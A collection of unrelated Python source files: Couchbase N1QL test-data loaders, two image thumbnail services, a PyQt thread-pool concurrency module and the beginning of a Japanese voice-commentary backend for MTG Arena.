self._load_bulk_data_in_buckets_using_n1ql(bucket, self.record_db[bucket_name])
def _populate_delta_buckets(self, table_name = "simple_table"):
if table_name != "simple_table":
client = self.client_map[table_name]
else:
client = self.client
query = "delete from {0} where primary_key_id is not null".format(table_name)
client._insert_execute_query(query=query)
query = "delete from {0} where primary_key_id is not null".format(self.database+"_"+table_name)
self.n1ql_query_runner_wrapper(n1ql_query=query, server=self.n1ql_server, verbose=True)
insert_sql = "insert into {0}(KEY k ,VALUE b) SELECT meta(b).id as k, b from {1} b where primary_key_id is not null".format(self.database+"_"+table_name,self.database+"_"+"copy_simple_table")
if self.use_advisor:
self.create_secondary_index("SELECT meta(b).id as k, b from {0} b where primary_key_id is not null".format(self.database+"_"+"copy_simple_table"))
try:
self.log.info("n1ql query is {0}".format(insert_sql))
self.n1ql_helper.run_cbq_query(query=insert_sql, server=self.n1ql_server, verbose=True)
insert_sql = "INSERT INTO {0} SELECT * FROM copy_simple_table".format(table_name)
client._insert_execute_query(insert_sql)
except Exception, ex:
self.log.info(ex)
def load_subquery_test_data(self, bucket):
query = 'select primary_key_id from simple_table_1'
result = self.client._execute_sub_query(query)
primary_key_values = result
query = 'CREATE TABLE IF NOT EXISTS {0}.`simple_table_2` ' \
'(`order_id` VARCHAR(100) NOT NULL,`qty` INT(11) NULL DEFAULT NULL,`productId` VARCHAR(1000) NOT NULL' \
',`price` DECIMAL(10,0) NOT NULL,`primary_key_id` VARCHAR(100) NOT NULL,PRIMARY KEY (`order_id`),' \
'FOREIGN KEY (`primary_key_id`) REFERENCES `simple_table_1`(`primary_key_id`))'.format(self.database)
self.client._db_execute_query(query)
for primary_key_value in primary_key_values:
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_field = result
query = 'select decimal_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
decimal_field_value = result
query = 'select int_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
int_field_value = result
query = 'select datetime_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
datetime_field_value = result
query = 'select bool_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
bool_field_value = bool(result)
query = 'select varchar_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
varchar_value = result
query = 'select char_field1 from simple_table_1 where primary_key_id = {0}'.format(primary_key_value)
result = self.client._execute_sub_query(query)
char_value = result
orderid1 = "order-" + varchar_field
orderid2 = "order-" + str(self.query_helper._random_char()) + "_"+str(self.query_helper._random_int()) + varchar_field
price1 = self.query_helper._random_float()+10
price2 = self.query_helper._random_float()+100
qty1 = self.query_helper._random_int()
qty2 = self.query_helper._random_int()
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "snack", %s, %s)' % (orderid1, qty1, price1, primary_key_value)
self.client._insert_execute_query(query)
query = 'insert into simple_table_2 (order_id, qty, productId, price, primary_key_id) values ("%s", %s, "lunch", %s, %s)' % (orderid2, qty2, price2, primary_key_value)
self.client._insert_execute_query(query)
n1ql_insert_template = 'INSERT INTO %s (KEY, VALUE) VALUES ' \
'("%s", {"primary_key_id": "%s" ,"decimal_field1":%s,"int_field1":%s,' \
'"datetime_field1":"%s","bool_field1":%s,"varchar_field1":"%s",' \
'"char_field1":"%s","simple_table_2":[{"order_id":"%s","qty":%s,' \
'"productId":"snack","price":%s,"primary_key_id":"%s"},' \
'{"order_id":"%s","qty":%s,"productId":"lunch","price":%s,' \
'"primary_key_id":"%s"}] } )'\
% (bucket.name,primary_key_value, primary_key_value, decimal_field_value,
int_field_value, datetime_field_value, bool_field_value, varchar_value,
char_value, orderid1, qty1, price1, primary_key_value, orderid2, qty2,
price2, primary_key_value)
self.n1ql_helper.run_cbq_query(query=n1ql_insert_template, server=self.n1ql_server)
|
thumbnail_maker.py
|
# thumbnail_maker.py
import time
import os
import logging
from urllib.parse import urlparse
from urllib.request import urlretrieve
from queue import Queue
from threading import Thread
import PIL
from PIL import Image
FORMAT = "[%(threadName)s, %(asctime)s, %(levelname)s] %(message)s"
logging.basicConfig(filename='logfile.log', level=logging.DEBUG, format=FORMAT)
class ThumbnailMakerService(object):
def __init__(self, home_dir='.'):
self.home_dir = home_dir
self.input_dir = self.home_dir + os.path.sep + 'incoming'
self.output_dir = self.home_dir + os.path.sep + 'outgoing'
self.img_queue = Queue()
self.dl_queue = Queue()
def download_image(self):
"""download each image and save to the input dir"""
while not self.dl_queue.empty():
try:
url = self.dl_queue.get(block=False)
img_filename = urlparse(url).path.split('/')[-1]
dest_path = self.input_dir + os.path.sep + img_filename
urlretrieve(url, dest_path)
self.img_queue.put(img_filename)
logging.info("downloading images at URL " + url)
self.dl_queue.task_done()
except Queue.Empty:
logging.info("Queue empty")
def download_images(self, img_url_list):
"""validate inputs"""
if not img_url_list:
return
os.makedirs(self.input_dir, exist_ok=True)
logging.info("beginning image downloads")
start = time.perf_counter()
for url in img_url_list:
img_filename = urlparse(url).path.split('/')[-1]
dest_path = self.input_dir + os.path.sep + img_filename
urlretrieve(url, dest_path)
self.img_queue.put(img_filename)
end = time.perf_counter()
self.img_queue.put(None)
logging.info("downloaded {} images in {} seconds".format(len(img_url_list), end - start))
def perform_resizing(self):
"""validate inputs"""
os.makedirs(self.output_dir, exist_ok=True)
logging.info("beginning image resizing")
target_sizes = [32, 64, 200]
num_images = len(os.listdir(self.input_dir))
start = time.perf_counter()
while True:
filename = self.img_queue.get()
if filename:
logging.info("resizing image {}".format(filename))
orig_img = Image.open(self.input_dir + os.path.sep + filename)
for basewidth in target_sizes:
img = orig_img
# calculate target height of the resized image to maintain the aspect ratio
wpercent = (basewidth / float(img.size[0]))
hsize = int((float(img.size[1]) * float(wpercent)))
# perform resizing
img = img.resize((basewidth, hsize), PIL.Image.LANCZOS)
# save the resized image to the output dir with a modified file name
new_filename = os.path.splitext(filename)[0] + \
'_' + str(basewidth) + os.path.splitext(filename)[1]
img.save(self.output_dir + os.path.sep + new_filename)
os.remove(self.input_dir + os.path.sep + filename)
logging.info("done resizing image {}".format(filename))
self.img_queue.task_done()
else:
self.img_queue.task_done()
break
end = time.perf_counter()
logging.info("created {} thumbnails in {} seconds".format(num_images, end - start))
def make_thumbnails(self, img_url_list):
"""make thumbnails"""
logging.info("START make_thumbnails")
start = time.perf_counter()
for img_url in img_url_list:
self.dl_queue.put(img_url)
num_dl_threads = 4
for _ in range(num_dl_threads):
t = Thread(target=self.download_image)
t.start()
t2 = Thread(target=self.perform_resizing)
t2.start()
self.dl_queue.join()
self.img_queue.put(None)
t2.join()
end = time.perf_counter()
logging.info("END make_thumbnails in {} seconds".format(end - start))
|
climon.py
|
from multiprocessing import Process, Queue
import mon
import web
def main(conf_fname, debug=False):
sensor_queue = Queue()
monp = Process(target=mon.run, args=(conf_fname, sensor_queue, debug))
monp.start()
web.run(conf_fname, sensor_queue, debug)
monp.join()
if __name__ == '__main__':
main('climon.conf', debug=False)
|
parallel_processing.py
|
# -*- coding: utf-8 -*-
""" concurrent - A module for handing concurrency with PyQt
Adapted from Orange3: https://github.com/biolab/orange3/blob/master/Orange/widgets/utils/concurrent.py
"""
# define authorship information
__authors__ = ['Lars Fasel']
__author__ = ','.join(__authors__)
__credits__ = []
__copyright__ = 'Copyright (c) 2017'
__license__ = 'GNU AGPLv3'
# maintanence information
__maintainer__ = 'Lars Fasel'
__email__ = 'systemcheck@team-fasel.com'
# define version information
__requires__ = ['PyQt5']
__version_info__ = (0, 1, 0)
__version__ = 'v{}.{}.{}'.format(*__version_info__)
__revision__ = __version__
import threading
import atexit
import logging
import warnings
import weakref
from functools import partial
import concurrent.futures
from concurrent.futures import Future, CancelledError, TimeoutError
from contextlib import contextmanager
from PyQt5 import QtCore, QtWidgets, QtGui
@contextmanager
def locked(mutex):
"""
A context manager for locking an instance of a QMutex.
"""
mutex.lock()
try:
yield
finally:
mutex.unlock()
class _TaskDepotThread(QtCore.QThread):
"""
A special 'depot' thread used to transfer Task instance into threads
started by a QThreadPool.
"""
_lock = threading.Lock()
_instance = None
def __new__(cls):
if _TaskDepotThread._instance is not None:
raise RuntimeError("Already exists")
return QtCore.QThread.__new__(cls)
def __init__(self):
super().__init__()
self.start()
# Need to handle queued method calls from this thread.
self.moveToThread(self)
atexit.register(self._cleanup)
def _cleanup(self):
self.quit()
self.wait()
@staticmethod
def instance():
with _TaskDepotThread._lock:
if _TaskDepotThread._instance is None:
_TaskDepotThread._instance = _TaskDepotThread()
return _TaskDepotThread._instance
@QtCore.pyqtSlot(object, object)
def transfer(self, obj, thread):
"""
Transfer `obj` (:class:`QObject`) instance from this thread to the
target `thread` (a :class:`QThread`).
"""
assert obj.thread() is self
assert QtCore.QThread.currentThread() is self
obj.moveToThread(thread)
def __del__(self):
self._cleanup()
class _TaskRunnable(QtCore.QRunnable):
"""
A QRunnable for running a :class:`Task` by a :class:`ThreadExecutor`.
"""
def __init__(self, future, task, args, kwargs):
QtCore.QRunnable.__init__(self)
self.future = future
self.task = task
self.args = args
self.kwargs = kwargs
self.eventLoop = None
def run(self):
"""
Reimplemented from `QRunnable.run`
"""
self.eventLoop = QtCore.QEventLoop()
self.eventLoop.processEvents()
# Move the task to the current thread so it's events, signals, slots
# are triggered from this thread.
assert self.task.thread() is _TaskDepotThread.instance()
QtCore.QMetaObject.invokeMethod(
self.task.thread(), "transfer", QtCore.Qt.BlockingQueuedConnection,
QtCore.Q_ARG(object, self.task),
QtCore.Q_ARG(object, QtCore.QThread.currentThread())
)
self.eventLoop.processEvents()
# Schedule task.run from the event loop.
self.task.start()
# Quit the loop and exit when task finishes or is cancelled.
self.task.finished.connect(self.eventLoop.quit)
self.task.cancelled.connect(self.eventLoop.quit)
self.eventLoop.exec_()
class FutureRunnable(QtCore.QRunnable):
"""
A QRunnable to fulfil a `Future` in a QThreadPool managed thread.
Parameters
----------
future : concurrent.futures.Future
Future whose contents will be set with the result of executing
`func(*args, **kwargs)` after completion
func : Callable
Function to invoke in a thread
args : tuple
Positional arguments for `func`
kwargs : dict
Keyword arguments for `func`
Example
-------
>>> f = concurrent.futures.Future()
>>> task = FutureRunnable(f, int, (42,), {})
>>> QThreadPool.globalInstance().start(task)
>>> f.result()
42
"""
def __init__(self, future, func, args, kwargs):
# type: (Future, Callable, tuple, dict) -> None
super().__init__()
self.future = future
self.task = (func, args, kwargs)
def run(self):
"""
Reimplemented from `QRunnable.run`
"""
try:
if not self.future.set_running_or_notify_cancel():
# future was cancelled
return
func, args, kwargs = self.task
try:
result = func(*args, **kwargs)
except BaseException as ex: # pylint: disable=broad-except
self.future.set_exception(ex)
else:
self.future.set_result(result)
except BaseException: # pylint: disable=broad-except
log = logging.getLogger(__name__)
log.critical("Exception in worker thread.", exc_info=True)
class ThreadExecutor(QtCore.QObject, concurrent.futures.Executor):
"""
ThreadExecutor object class provides an interface for running tasks
in a QThreadPool.
Parameters
----------
parent : QObject
Executor's parent instance.
threadPool : Optional[QThreadPool]
Thread pool to be used by the instance of the Executor. If `None`
then ``QThreadPool.globalInstance()`` will be used.
"""
def __init__(self, parent=None, threadPool=None, **kwargs):
super().__init__(parent, **kwargs)
if threadPool is None:
threadPool = QtCore.QThreadPool.globalInstance()
self._threadPool = threadPool
self._depot_thread = None
self._futures = []
self._shutdown = False
self._state_lock = threading.Lock()
def _get_depot_thread(self):
if self._depot_thread is None:
self._depot_thread = _TaskDepotThread.instance()
return self._depot_thread
def submit(self, func, *args, **kwargs):
"""
Reimplemented from :class:`concurrent.futures.Executor`
Schedule the `func(*args, **kwargs)` to be executed and return an
:class:`Future` instance representing the result of the computation.
"""
with self._state_lock:
if self._shutdown:
raise RuntimeError("Cannot schedule new futures after " +
"shutdown.")
f = Future()
runnable = FutureRunnable(f, func, args, kwargs)
self._futures.append(f)
f.add_done_callback(self._future_done)
self._threadPool.start(runnable)
return f
def __make_task_runnable(self, task):
if task.thread() is not QtCore.QThread.currentThread():
raise ValueError("Can only submit Tasks from it's own " +
"thread.")
if task.parent() is not None:
raise ValueError("Can not submit Tasks with a parent.")
task.moveToThread(self._get_depot_thread())
# Use the Task's own Future object
f = task.future()
runnable = _TaskRunnable(f, task, (), {})
return f, runnable
def shutdown(self, wait=True):
"""
Shutdown the executor and free all resources. If `wait` is True then
wait until all pending futures are executed or cancelled.
"""
with self._state_lock:
self._shutdown = True
futures = list(self._futures)
if wait:
concurrent.futures.wait(futures)
def _future_done(self, future):
# Remove futures when finished.
self._futures.remove(future)
class FutureWatcher(QtCore.QObject):
"""
An `QObject` watching the state changes of a `concurrent.futures.Future`
Note
----
The state change notification signals (`done`, `finished`, ...)
are always emitted when the control flow reaches the event loop
(even if the future is already completed when set).
Note
----
An event loop must be running, otherwise the notifier signals will
not be emitted.
Parameters
----------
parent : QObject
Parent object.
future : Future
The future instance to watch.
Example
-------
>>> app = QCoreApplication.instance() or QCoreApplication([])
>>> f = submit(lambda i, j: i ** j, 10, 3)
>>> watcher = FutureWatcher(f)
>>> watcher.resultReady.connect(lambda res: print("Result:", res))
>>> watcher.done.connect(app.quit)
>>> _ = app.exec()
Result: 1000
>>> f.result()
1000
"""
#: Signal emitted when the future is done (cancelled or finished)
done = QtCore.pyqtSignal(Future)
#: Signal emitted when the future is finished (i.e. returned a result
#: or raised an exception - but not if cancelled)
finished = QtCore.pyqtSignal(Future)
#: Signal emitted when the future was cancelled
cancelled = QtCore.pyqtSignal(Future)
#: Signal emitted with the future's result when successfully finished.
resultReady = QtCore.pyqtSignal(object)
#: Signal emitted with the future's exception when finished with an
#: exception.
exceptionReady = QtCore.pyqtSignal(BaseException)
# A private event type used to notify the watcher of a Future's completion
__FutureDone = QtCore.QEvent.registerEventType()
def __init__(self, future=None, parent=None, **kwargs):
super().__init__(parent, **kwargs)
self.__future = None
if future is not None:
self.setFuture(future)
def setFuture(self, future):
# type: (Future) -> None
"""
Set the future to watch.
Raise a `RuntimeError` if a future is already set.
Parameters
----------
future : Future
"""
if self.__future is not None:
raise RuntimeError("Future already set")
self.__future = future
selfweakref = weakref.ref(self)
def on_done(f):
assert f is future
selfref = selfweakref()
if selfref is None:
return
try:
QtCore.QCoreApplication.postEvent(
selfref, QtCore.QEvent(FutureWatcher.__FutureDone))
except RuntimeError:
# Ignore RuntimeErrors (when C++ side of QObject is deleted)
# (? Use QObject.destroyed and remove the done callback ?)
pass
future.add_done_callback(on_done)
def future(self):
# type: () -> Future
"""
Return the future instance.
"""
return self.__future
def isCancelled(self):
warnings.warn("isCancelled is deprecated", DeprecationWarning,
stacklevel=2)
return self.__future.cancelled()
def isDone(self):
warnings.warn("isDone is deprecated", DeprecationWarning,
stacklevel=2)
return self.__future.done()
def result(self):
# type: () -> Any
"""
Return the future's result.
Note
----
This method is non-blocking. If the future has not yet completed
it will raise an error.
"""
try:
return self.__future.result(timeout=0)
except TimeoutError:
raise RuntimeError("Future is not yet done")
def exception(self):
# type: () -> Optional[BaseException]
"""
Return the future's exception.
Note
----
This method is non-blocking. If the future has not yet completed
it will raise an error.
"""
try:
return self.__future.exception(timeout=0)
except TimeoutError:
raise RuntimeError("Future is not yet done")
def __emitSignals(self):
assert self.__future is not None
assert self.__future.done()
if self.__future.cancelled():
self.cancelled.emit(self.__future)
self.done.emit(self.__future)
elif self.__future.done():
self.finished.emit(self.__future)
self.done.emit(self.__future)
if self.__future.exception():
self.exceptionReady.emit(self.__future.exception())
else:
self.resultReady.emit(self.__future.result())
else:
assert False
def customEvent(self, event):
# Reimplemented.
if event.type() == FutureWatcher.__FutureDone:
self.__emitSignals()
super().customEvent(event)
class FutureSetWatcher(QtCore.QObject):
"""
An `QObject` watching the state changes of a list of
`concurrent.futures.Future` instances
Note
----
The state change notification signals (`doneAt`, `finishedAt`, ...)
are always emitted when the control flow reaches the event loop
(even if the future is already completed when set).
Note
----
An event loop must be running, otherwise the notifier signals will
not be emitted.
Parameters
----------
parent : QObject
Parent object.
futures : List[Future]
A list of future instance to watch.
Example
-------
>>> app = QCoreApplication.instance() or QCoreApplication([])
>>> fs = [submit(lambda i, j: i ** j, 10, 3) for i in range(10)]
>>> watcher = FutureSetWatcher(fs)
>>> watcher.resultReadyAt.connect(
... lambda i, res: print("Result at {}: {}".format(i, res))
... )
>>> watcher.doneAll.connect(app.quit)
>>> _ = app.exec()
Result at 0: 1000
...
"""
#: Signal emitted when the future at `index` is done (cancelled or
#: finished)
doneAt = QtCore.pyqtSignal([int, Future])
#: Signal emitted when the future at index is finished (i.e. returned
#: a result)
finishedAt = QtCore.pyqtSignal([int, Future])
#: Signal emitted when the future at `index` was cancelled.
cancelledAt = QtCore.pyqtSignal([int, Future])
#: Signal emitted with the future's result when successfully
#: finished.
resultReadyAt = QtCore.pyqtSignal([int, object])
#: Signal emitted with the future's exception when finished with an
#: exception.
exceptionReadyAt = QtCore.pyqtSignal([int, BaseException])
#: Signal reporting the current completed count
progressChanged = QtCore.pyqtSignal([int, int])
#: Signal emitted when all the futures have completed.
doneAll = QtCore.pyqtSignal()
def __init__(self, futures=None, *args, **kwargs):
super().__init__(*args, **kwargs)
self.__futures = None
self.__countdone = 0
if futures:
self.setFutures(futures)
def setFutures(self, futures):
# type: (List[Future]) -> None
"""
Set the future instances to watch.
Raise a `RuntimeError` if futures are already set.
Parameters
----------
futures : List[Future]
"""
if self.__futures is not None:
raise RuntimeError("already set")
self.__futures = []
selfweakref = weakref.ref(self)
schedule_emit = methodinvoke(self, "__emitpending", (int, Future))
for i, future in enumerate(futures):
self.__futures.append(future)
def on_done(index, f):
selfref = selfweakref() # not safe really
if selfref is None:
return
try:
schedule_emit(index, f)
except RuntimeError:
# Ignore RuntimeErrors (when C++ side of QObject is deleted)
# (? Use QObject.destroyed and remove the done callback ?)
pass
future.add_done_callback(partial(on_done, i))
@QtCore.pyqtSlot(int, Future)
def __emitpending(self, index, future):
# type: (int, Future) -> None
assert QtCore.QThread.currentThread() is self.thread()
assert self.__futures[index] is future
assert future.done()
assert self.__countdone < len(self.__futures)
self.__futures[index] = None
self.__countdone += 1
if future.cancelled():
self.cancelledAt.emit(index, future)
self.doneAt.emit(index, future)
elif future.done():
self.finishedAt.emit(index, future)
self.doneAt.emit(index, future)
if future.exception():
self.exceptionReadyAt.emit(index, future.exception())
else:
self.resultReadyAt.emit(index, future.result())
else:
assert False
self.progressChanged.emit(self.__countdone, len(self.__futures))
if self.__countdone == len(self.__futures):
self.doneAll.emit()
def flush(self):
"""
Flush all pending signal emits currently enqueued.
"""
assert QtCore.QThread.currentThread() is self.thread()
QtCore.QCoreApplication.sendPostedEvents(self, QtCore.QEvent.MetaCall)
class methodinvoke(object):
"""
A thin wrapper for invoking QObject's method through
`QMetaObject.invokeMethod`.
This can be used to invoke the method across thread boundaries (or even
just for scheduling delayed calls within the same thread).
Note
----
An event loop MUST be running in the target QObject's thread.
Parameters
----------
obj : QObject
A QObject instance.
method : str
The method name. This method must be registered with the Qt object
meta system (e.g. decorated by a Slot decorator).
arg_types : tuple
A tuple of positional argument types.
conntype : Qt.ConnectionType
The connection/call type. Qt.QueuedConnection (the default) and
Qt.BlockingConnection are the most interesting.
See Also
--------
QMetaObject.invokeMethod
Example
-------
>>> app = QCoreApplication.instance() or QCoreApplication([])
>>> quit = methodinvoke(app, "quit", ())
>>> t = threading.Thread(target=quit)
>>> t.start()
>>> app.exec()
0
"""
@staticmethod
def from_method(method, arg_types=(), *, conntype=QtCore.Qt.QueuedConnection):
"""
Create and return a `methodinvoke` instance from a bound method.
Parameters
----------
method : Union[types.MethodType, types.BuiltinMethodType]
A bound method of a QObject registered with the Qt meta object
system (e.g. decorated by a Slot decorators)
arg_types : Tuple[Union[type, str]]
A tuple of positional argument types.
conntype: Qt.ConnectionType
The connection/call type (Qt.QueuedConnection and
Qt.BlockingConnection are the most interesting)
Returns
-------
invoker : methodinvoke
"""
obj = method.__self__
name = method.__name__
return methodinvoke(obj, name, arg_types, conntype=conntype)
def __init__(self, obj, method, arg_types=(), *,
conntype=QtCore.Qt.QueuedConnection):
self.obj = obj
self.method = method
self.arg_types = tuple(arg_types)
self.conntype = conntype
def __call__(self, *args):
args = [QtCore.Q_ARG(atype, arg) for atype, arg in zip(self.arg_types, args)]
return QtCore.QMetaObject.invokeMethod(
self.obj, self.method, self.conntype, *args)
|
thumbnail_service.py
|
import asyncio
import errno
import json
import logging
import os
import threading
import uuid
from .redis_factory import RedisFactory
from .thumbnail_processor import ThumbnailProcessor
class ThumbnailException(Exception):
def __init__(self, reason):
self.reason = reason
class FileValidationException(ThumbnailException):
def __init__(self, reason):
ThumbnailException.__init__(self, reason)
class ThumbnailService:
FORM_PARAMETER = 'image'
THUMBNAIL_PATH = os.environ.get('THUMBNAIL_PATH', '/usr/images/')
def __init__(self, redis_factory=RedisFactory()):
self.log = logging.getLogger('ThumbnailService')
self.redis_factory = redis_factory
self.processor = ThumbnailProcessor()
def get_file(self, id):
return self._build_file_entity(self._get_file_info(id))
def get_files(self):
redis = self.redis_factory.create_instance()
data = redis.mget(redis.keys('file-*'))
return [self._build_file_entity(json.loads(info)) for info in data]
async def save_file(self, reader):
field = await reader.next()
while field is not None and field.name != self.FORM_PARAMETER:
field = await reader.next()
if field is None:
raise FileValidationException('\"{}\" parameter is missing'.format(self.FORM_PARAMETER))
redis = self.redis_factory.create_instance()
id = str(uuid.uuid4())
self._try_create_folder()
size = await self._try_save_file(field, id)
info = {
'id': id,
'filename': field.filename,
'path': self.THUMBNAIL_PATH,
'ready': False,
'size': {
'original': size
}
}
redis.set(self._build_key(info['id']), json.dumps(info))
self._run_save_file(info)
return self._build_file_entity(info)
def _run_save_file(self, info):
def _run():
file_path = os.path.join(self.THUMBNAIL_PATH, info['id'])
self.processor.process(file_path)
info['size']['thumbnail'] = os.stat(self.processor.build_thumbnail_filename(file_path)).st_size
info['ready'] = True
redis = self.redis_factory.create_instance()
redis.set(self._build_key(info['id']), json.dumps(info))
threading.Thread(target=_run).start()
def _try_create_folder(self):
if not os.path.exists(self.THUMBNAIL_PATH):
try:
os.makedirs(self.THUMBNAIL_PATH)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise ThumbnailException('Failed to access to the image storage')
async def _try_save_file(self, field, filename):
size = 0
with open(os.path.join(self.THUMBNAIL_PATH, filename), 'wb') as f:
while True:
chunk = await field.read_chunk()
if not chunk:
break
size += len(chunk)
f.write(chunk)
return size
def delete_file(self, id):
redis = self.redis_factory.create_instance()
info = self._get_file_info(id, redis)
file_path = os.path.join(info['path'], info['id'])
os.remove(file_path)
os.remove(self.processor.build_thumbnail_filename(file_path))
redis.delete(self._build_key(id))
return self._build_file_entity(info)
def get_thumbnail_info(self, id):
info = self._get_file_info(id)
path = os.path.join(info['path'], self.processor.build_thumbnail_filename(info['id']))
splitted = os.path.splitext(info['filename'])
return {
'path': path,
'filename': self.processor.build_thumbnail_filename(splitted[0]) + '.jpg'
}
def _get_file_info(self, id, redis=None):
redis = redis or self.redis_factory.create_instance()
key = self._build_key(id)
data = redis.get(key)
if data is None:
raise FileValidationException('Thumbnail with id = {} does not exist'.format(id))
return json.loads(data)
def _build_key(self, filename):
return 'file-{}'.format(filename)
def _build_file_entity(self, data):
result = {
'id': data['id'],
'filename': data['filename'],
'ready': data['ready'],
'size': {
'original': data['size']['original']
}
}
if data['ready']:
result['size']['thumbnail'] = data['size']['thumbnail']
return result
|
commentary_backend.py
|
import _thread
from datetime import datetime
from enum import Enum
import json
import logging
import logging.handlers
import os
import re
import sys
import tkinter
from tkinter import StringVar, filedialog, messagebox, ttk
from tkinter.scrolledtext import ScrolledText
import urllib.parse
import urllib.request
import psutil
import websocket
from seikasay2 import SeikaSay2
# message from mtgatracker_backend
class MessageKey:
GAME_HISTORY_EVENT = "game_history_event"
TYPE = "type"
TEXT = "text"
class MessageValue:
GAME = "game"
TURN = "turn"
HERO = "hero"
OPPONENT = "opponent"
class Verb:
ATTAKING = "attacking"
BLOCKS = "blocks"
CASTS = "casts"
COUNTERS = "counters"
DRAWS = "draws"
EXILES = "exiles"
LIFE_TOTAL_CHANGED = "'s life total changed"
PLAYS = "plays"
RESOLVES = "resolves"
SENT_TO_GRAVEYARD = "sent to graveyard"
STARTING_HAND = "'s starting hand:"
VS = "vs"
class Reason:
# message from mtgatracker_backend
CONJURE = "(Conjure)"
DESTROY = "(Destroy)"
DISCARD = "(Discard)"
MILL = "(Mill)"
PUT = "(Put)"
SACRIFICE = "(Sacrifice)"
SBA_DAMEGE = "(SBA_Damage)"
SBA_DEATHTOUCH = "(SBA_Deathtouch)",
SBA_ZERO_TOUGHNESS = "(SBA_ZeroToughness)"
SBA_UNATTACHED_AURA = "(SBA_UnattachedAura)"
NIL = "(nil)"
class ParseKey:
IS_OPPONENT = "isOpponent"
MESSAGE_TYPE = "messageType"
EVENT = "event"
VERB = "verb"
ATTACKER = "attacker"
BLOCKER = "blocker"
CARD = "card"
SOURCE = "source"
TARGET = "target"
REASON = "reason"
LIFE_FROM = "life_from"
LIFE_TO = "life_to"
LIFE_DIFF = "life_diff"
class ReplaceWord(Enum):
ATTACKER = ParseKey.ATTACKER
BLOCKER = ParseKey.BLOCKER
CARD = ParseKey.CARD
SOURCE = ParseKey.SOURCE
TARGET = ParseKey.TARGET
LIFE_FROM = ParseKey.LIFE_FROM
LIFE_TO = ParseKey.LIFE_TO
LIFE_DIFF = ParseKey.LIFE_DIFF
class ConfigKey:
SEIKA_SAY2_PATH = "seikaSay2Path"
SPEAKER1 = "speaker1"
SPEAKER2 = "speaker2"
CID = "cid"
NAME = "name"
HERO_COMMENTARY_TYPE = "heroCommentaryType"
OPPONENT_COMMENTARY_TYPE = "opponentCommentaryType"
MTGATRACKER_BACKEND_URL = "mtgatrackerBackendUrl"
WAV_OUTPUT = "wavOutput"
YUKARINETTE_CONNECTOR_NEO = "yukarinetteConnectorNeo"
YUKARINETTE_CONNECTOR_NEO_URL = "yukarinetteConnectorNeoUrl"
class ConfigValue:
SPEAKER1 = "speaker1"
SPEAKER2 = "speaker2"
NEVER = "never"
class SpeakerKey:
SPEAK = "speak"
TEXT = MessageKey.TEXT
EVENT = ParseKey.EVENT
TYPE = MessageKey.TYPE
class SpeakerValue:
SEIKA_SAY2 = "seikaSay2"
GAIN = "gain"
LOSE = "lose"
class SpeakerParamKey:
ASYNC = "async"
VOLUME = "volume"
SPEED = "speed"
PITCH = "pitch"
ALPHA = "alpha"
INTONATION = "intonation"
EMOTION_EP = "emotionEP"
EMOTION_P = "emotionP"
OVER_BANNER = "overBanner"
class SpeakerLabel:
GAME_START = "ゲーム開始時"
GAME_WIN = "ゲーム勝利時"
GAME_LOSE = "ゲーム敗北時"
MULLIGAN_CHECK = "マリガンチェック時"
TURN_START = "ターン開始時"
DRAW = "カードを引いた時"
DISCARD = "カードを捨てた時"
PLAY_LAND = "土地をプレイした時"
CAST_SPELL = "呪文を唱えた時"
COUNTERED = "呪文が打ち消された時"
RESOLVE = "呪文が解決した時"
EXILE = "カードが追放された時"
CONJURE = "墓地にカードが置かれた時(創出)"
DESTROY = "墓地にカードが置かれた時(破壊)"
MILL = "墓地にカードが置かれた時(切削)"
PUT = "墓地にカードが置かれた時(効果)"
SACRIFICE = "墓地にカードが置かれた時(生け贄)"
DIE = "墓地にカードが置かれた時(死亡)"
UNATTACHED_AURA = "墓地にカードが置かれた時(不正オーラ)"
NIL = "墓地にカードが置かれた時(対象不適正)"
ATTACK = "攻撃クリーチャー指定時"
BLOCK = "ブロッククリーチャー指定時"
LIFE_GAIN = "ライフが増えた時"
LIFE_LOSE = "ライフが減った時"
class Event:
GAME_START = "gameStart"
GAME_WIN = "gameWin"
GAME_LOSE = "gameLose"
MULLIGAN_CHECK = "MulliganCheck"
TURN_START = "TurnStart"
DRAW = "Draw"
DISCARD = "Discard"
PLAY_LAND = "PlayLand"
CAST_SPELL = "CastSpell"
COUNTERED = "Countered"
RESOLVE = "Resolve"
ATTACK = "Attack"
BLOCK = "Block"
LIFE_GAIN = "LifeGain"
LIFE_LOSE = "LifeLose"
DIE = "Die"
DESTROY = "Destroy"
SACRIFICE = "Sacrifice"
EXILE = "Exile"
PUT_INTO_GRAVEYARD = "PutIntoGraveyard"
CONJURE = "Conjure"
class SpeakerWindowEntry(Enum):
# (キー名, ラベルtext, textvariable)
GAME_START = (Event.GAME_START, "ゲーム開始時:")
GAME_WIN = (Event.GAME_WIN, "ゲーム勝利時:")
GAME_LOSE = (Event.GAME_LOSE, "ゲーム敗北時:")
MULLIGAN_CHECK = (Event.MULLIGAN_CHECK, "マリガンチェック時:")
TURN_START = (Event.TURN_START, "ターン開始時:")
DRAW = (Event.DRAW, "カードを引いた時:")
DISCARD = (Event.DISCARD, "カードを捨てた時:")
PLAY_LAND = (Event.PLAY_LAND, "土地をプレイした時:")
CAST_SPELL = (Event.CAST_SPELL, "呪文を唱えた時:")
COUNTERED = (Event.COUNTERED, "呪文が打ち消された時:")
RESOLVE = (Event.RESOLVE, "呪文が解決された時:")
ATTACK = (Event.ATTACK, "攻撃クリーチャー指定時:")
BLOCK = (Event.BLOCK, "ブロッククリーチャー指定時:")
LIFE_GAIN = (Event.LIFE_GAIN, "ライフが増えた時:")
LIFE_LOSE = (Event.LIFE_LOSE, "ライフが減った時:")
DIE = (Event.DIE, "クリーチャーが死亡した時:")
DESTROY = (Event.DESTROY, "パーマネントが破壊された時:")
SACRIFICE = (Event.SACRIFICE, "パーマネントを生け贄に捧げた時:")
EXILE = (Event.EXILE, "カードが追放された時:")
